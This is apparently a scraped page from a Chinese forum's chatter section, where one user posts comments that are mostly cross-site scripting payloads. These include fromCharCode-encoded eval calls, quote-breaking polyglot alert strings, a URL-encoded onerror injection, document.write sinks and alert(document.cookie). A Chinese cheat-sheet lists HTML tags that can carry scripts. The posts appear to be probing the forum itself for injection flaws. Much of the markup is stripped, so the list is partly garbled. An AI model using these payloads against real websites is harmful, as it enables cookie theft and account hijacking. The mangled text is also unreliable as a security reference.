如果该文章侵犯到您的权益,请联系右下角在线客服,我们将在第一时间进行删除 点击查看次元导航网「必看」 系统公告-主站域名更新【2023-09-21更新】 欢迎加入泡沫次元tg频道 低价机场【VPN】9元/月---高速机场【VPN】10元/月---千速喵机场【VPN】 非常重要的提示:您在本站遇见的任何问题,包括链接失效,解压密码错误,充值未到账,请第一时间联系右下角在线客服,我们将在第一时间为您处理! 水遁 灌水专区 23年12月24日 编辑 拉拉高 取消关注 关注 私信 大坝水秀哈 给TA发电 共{{data.count}}人 人已发电
geeswgfsew 学前班lv0 23年12月26日 eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41))
geeswgfsew 学前班lv0 23年12月26日 #引用外部的xss alert(“hack”) #弹出hack alert(document.cookie) #弹出cookie ‘🚀img标签’: #弹出cookie 注:对于数字,可以不用引号 ‘🚀body标签’: 可以使用onload属性或其他更加模糊的属性(如属性)在标记内部传递XSS有效内容background ‘🚀iframe标签’: 该标签允许另一个HTML网页的嵌入到父页面。IFrame可以包含JavaScript,但是,请注意,由于浏览器的内容安全策略(CSP) iFrame中的JavaScript无法访问父页面的DOM。然而,IFrame仍然是非常有效的解除网络钓鱼攻击的手段 ‘🚀input标签’: 在某些浏览器中,如果标记的type属性设置为image,则可以对其进行操作以嵌入脚本 ‘🚀link标签’: 标签,这是经常被用来连接外部的样式表可以包含的脚本 ‘🚀table标签’: 可以利用和标签的background属性来引用脚本而不是图像 ‘🚀div标签’: 该标签,类似于和标签也可以指定一个背景,因此嵌入的脚本 ‘🚀object标签’: 该标签可用于从外部站点脚本包含
geeswgfsew 学前班lv0 23年12月26日 ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>alert(String.fromCharCode(88,83,83))
<script>alert(‘XSS’)</script>
eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41))
name=”;alert(‘XSS’);”
alert(‘XSS’)//
document.write(location.hash.substring(1));
<script>alert(‘XSS’)
document.write(“” + $decodeURI(lang) + “”);
通过按钮点击触发xss 移动到元素触发xss
onclick点击触发事件 onmousedown触发 利用a标签的href属性触发
#引用外部的xss
alert(“hack”) #弹出hack
alert(document.cookie) #弹出cookie
‘🚀img标签’:
#弹出cookie
注:对于数字,可以不用引号
‘🚀body标签’: 可以使用onload属性或其他更加模糊的属性(如属性)在标记内部传递XSS有效内容background
‘🚀iframe标签’: 该标签允许另一个HTML网页的嵌入到父页面。IFrame可以包含JavaScript,但是,请注意,由于浏览器的内容安全策略(CSP)
iFrame中的JavaScript无法访问父页面的DOM。然而,IFrame仍然是非常有效的解除网络钓鱼攻击的手段
‘🚀input标签’: 在某些浏览器中,如果标记的type属性设置为image,则可以对其进行操作以嵌入脚本
‘🚀link标签’: 标签,这是经常被用来连接外部的样式表可以包含的脚本
‘🚀table标签’: 可以利用和标签的background属性来引用脚本而不是图像
‘🚀div标签’: 该标签,类似于和标签也可以指定一个背景,因此嵌入的脚本
‘🚀object标签’: 该标签可用于从外部站点脚本包含
123
123ttt
1″%20onerror%3Dlocation%3D”javascript%3Aalert%25281%2529″%20 reggge
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
>”>’>alert(String.fromCharCode(88,83,83))
‘”>>”>
prompt(1)@gmail.com’–>”>
alert(document.cookie)”>
’”>
xxs link
eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41))